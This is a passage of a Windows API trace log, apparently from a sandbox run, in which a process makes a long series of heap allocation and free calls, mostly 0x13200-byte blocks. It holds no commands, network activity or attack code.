lpMem=0x56b800 | out: hHeap=0x560000) returned 1 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58db10 | out: hHeap=0x560000) returned 1 [0188.697] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x570060 | out: hHeap=0x560000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9900) returned 0x5793b0 [0188.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1bf0) returned 0x5ad910 [0188.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9937) returned 0x58db10 [0188.889] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.889] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x56b260 [0188.889] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9900) returned 0x5793b0 [0188.889] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1bf0) returned 0x5ad910 [0188.890] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.890] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9937) returned 0x5ad910 [0188.891] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.892] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x570380 [0188.892] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b260 | out: hHeap=0x560000) returned 1 [0188.892] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x583760 | out: hHeap=0x560000) returned 1 [0188.893] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x59da10 | out: hHeap=0x560000) returned 1 [0188.893] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5707e0 | out: hHeap=0x560000) returned 1 [0188.893] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x5793b0 [0188.894] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x597450 [0188.894] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x568cd0 [0188.894] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x5b7250 [0188.894] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5792b0 [0188.894] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x568cd0 | out: hHeap=0x560000) returned 1 [0188.894] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x5ca460 [0188.895] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x579310 [0188.895] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5792b0 | out: hHeap=0x560000) returned 1 [0188.895] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x5dd670 [0188.895] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x56b260 [0188.895] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x579310 | out: hHeap=0x560000) returned 1 [0188.895] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x5f0880 [0188.896] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x30) returned 0x5783e0 [0188.896] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b260 | out: hHeap=0x560000) returned 1 [0188.896] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x603a90 [0188.896] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x616ca0 [0188.897] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x48) returned 0x570b00 [0188.897] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5783e0 | out: hHeap=0x560000) returned 1 [0188.897] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x629eb0 [0188.898] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x63d0c0 [0188.898] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1e80080 [0188.899] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x68) returned 0x568cd0 [0188.899] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x570b00 | out: hHeap=0x560000) returned 1 [0188.899] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1e93290 [0188.900] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1ea64a0 [0188.900] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1eb96b0 [0188.901] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1ecc8c0 [0188.901] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x98) returned 0x564c20 [0188.901] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x568cd0 | out: hHeap=0x560000) returned 1 [0188.901] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1edfad0 [0188.902] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1ef2ce0 [0188.902] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1f05ef0 [0188.903] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1f19100 [0188.903] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1f2c310 [0188.904] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1f3f520 [0188.904] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe0) returned 0x568cd0 [0188.904] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564c20 | out: hHeap=0x560000) returned 1 [0188.904] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x1f52730 [0188.905] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2060080 [0188.906] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2073290 [0188.906] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20864a0 [0188.907] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20996b0 [0188.907] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20ac8c0 [0188.908] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20bfad0 [0188.909] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20d2ce0 [0188.909] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20e5ef0 [0188.910] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x150) returned 0x56b080 [0188.910] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x568cd0 | out: hHeap=0x560000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x20f9100 [0188.910] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x210c310 [0188.911] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x211f520 [0188.912] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2132730 [0188.912] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2145940 [0188.913] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2158b50 [0188.913] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x216bd60 [0188.914] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x217ef70 [0188.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2192180 [0188.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x21a5390 [0188.916] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x21b85a0 [0188.916] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x21cb7b0 [0188.917] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x21de9c0 [0188.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x21f1bd0 [0188.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1f8) returned 0x5788e0 [0188.918] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b080 | out: hHeap=0x560000) returned 1 [0188.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2204de0 [0188.919] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2217ff0 [0189.136] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x222b200 [0189.137] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x223e410 [0189.138] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2260080 [0189.139] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2273290 [0189.139] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22864a0 [0189.140] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22996b0 [0189.140] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22ac8c0 [0189.140] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22bfad0 [0189.141] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22d2ce0 [0189.143] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22e5ef0 [0189.143] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x22f9100 [0189.144] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x230c310 [0189.144] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x231f520 [0189.145] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2332730 [0189.145] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2345940 [0189.146] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2358b50 [0189.146] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x236bd60 [0189.147] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x237ef70 [0189.147] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2392180 [0189.148] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2f0) returned 0x578ae0 [0189.148] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0189.148] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x23a5390 [0189.148] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x23b85a0 [0189.149] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x23cb7b0 [0189.149] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x23de9c0 [0189.150] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x23f1bd0 [0189.150] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2404de0 [0189.150] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2417ff0 [0189.151] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x242b200 [0189.151] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x243e410 [0189.152] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2451620 [0189.152] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2464830 [0189.153] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2477a40 [0189.153] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x248ac50 [0189.153] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x249de60 [0189.154] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x24b1070 [0189.154] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x24c4280 [0189.155] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x24d7490 [0189.155] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x24ea6a0 [0189.156] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x24fd8b0 [0189.156] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2510ac0 [0189.157] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2523cd0 [0189.157] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2536ee0 [0189.158] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x254a0f0 [0189.158] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x255d300 [0189.159] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2570510 [0189.159] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2583720 [0189.160] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2596930 [0189.160] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x25a9b40 [0189.160] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x25bcd50 [0189.161] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x25cff60 [0189.161] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x25e3170 [0189.162] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x468) returned 0x58c5c0 [0189.162] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x578ae0 | out: hHeap=0x560000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x25f6380 [0189.162] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2609590 [0189.163] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x261c7a0 [0189.163] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x262f9b0 [0189.164] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2642bc0 [0189.164] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2660080 [0189.166] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2673290 [0189.167] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26864a0 [0189.167] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26996b0 [0189.168] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26ac8c0 [0189.168] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26bfad0 [0189.169] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26d2ce0 [0189.169] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26e5ef0 [0189.170] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x26f9100 [0189.170] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x270c310 [0189.171] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x271f520 [0189.171] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2732730 [0189.172] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2745940 [0189.172] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2758b50 [0189.328] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x276bd60 [0189.328] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x277ef70 [0189.329] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2792180 [0189.329] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x27a5390 [0189.330] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x27b85a0 [0189.330] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x27cb7b0 [0189.331] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x27de9c0 [0189.332] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x27f1bd0 [0189.332] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2804de0 [0189.332] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2817ff0 [0189.333] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x282b200 [0189.333] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x283e410 [0189.334] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2851620 [0189.334] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2864830 [0189.335] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2877a40 [0189.335] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x288ac50 [0189.336] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x289de60 [0189.337] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x28b1070 [0189.337] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x28c4280 [0189.338] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x28d7490 [0189.338] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x28ea6a0 [0189.339] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x28fd8b0 [0189.339] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2910ac0 [0189.340] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2923cd0 [0189.340] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2936ee0 [0189.341] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x294a0f0 [0189.342] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x295d300 [0189.342] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2970510 [0189.343] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x698) returned 0x5788e0 [0189.343] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58c5c0 | out: hHeap=0x560000) returned 1 [0189.343] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2983720 [0189.343] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2996930 [0189.344] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x29a9b40 [0189.344] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x29bcd50 [0189.344] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x29cff60 [0189.344] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x29e3170 [0189.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x29f6380 [0189.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a09590 [0189.348] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a1c7a0 [0189.348] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a2f9b0 [0189.348] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a42bc0 [0189.349] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a55dd0 [0189.350] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a68fe0 [0189.350] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a7c1f0 [0189.351] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2a8f400 [0189.351] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2aa2610 [0189.352] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ab5820 [0189.352] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ac8a30 [0189.353] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2adbc40 [0189.354] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2aeee50 [0189.354] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b02060 [0189.355] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b15270 [0189.355] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b28480 [0189.356] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b3b690 [0189.356] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b4e8a0 [0189.357] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b61ab0 [0189.357] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b74cc0 [0189.357] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b87ed0 [0189.358] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2b9b0e0 [0189.358] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2bae2f0 [0189.359] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2bc1500 [0189.360] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2bd4710 [0189.360] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2be7920 [0189.361] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2bfab30 [0189.361] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c0dd40 [0189.514] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c20f50 [0189.514] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c34160 [0189.515] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c47370 [0189.515] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c5a580 [0189.516] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c6d790 [0189.517] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c809a0 [0189.517] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2c93bb0 [0189.517] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ca6dc0 [0189.518] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2cb9fd0 [0189.518] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ccd1e0 [0189.519] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ce03f0 [0189.519] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2cf3600 [0189.520] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d06810 [0189.520] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d19a20 [0189.520] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d2cc30 [0189.521] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d3fe40 [0189.521] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d53050 [0189.522] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d66260 [0189.522] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d79470 [0189.523] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d8c680 [0189.523] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2d9f890 [0189.524] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2db2aa0 [0189.525] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2dc5cb0 [0189.525] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2dd8ec0 [0189.526] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2dec0d0 [0189.526] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2dff2e0 [0189.527] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e124f0 [0189.527] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e25700 [0189.528] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e38910 [0189.528] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e60080 [0189.530] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e73290 [0189.531] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e864a0 [0189.531] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2e996b0 [0189.531] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2eac8c0 [0189.532] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ebfad0 [0189.533] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9e0) returned 0x58c5c0 [0189.533] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ed2ce0 [0189.533] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ee5ef0 [0189.534] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2ef9100 [0189.534] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f0c310 [0189.534] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13200) returned 0x2f1f520 [0189.535] 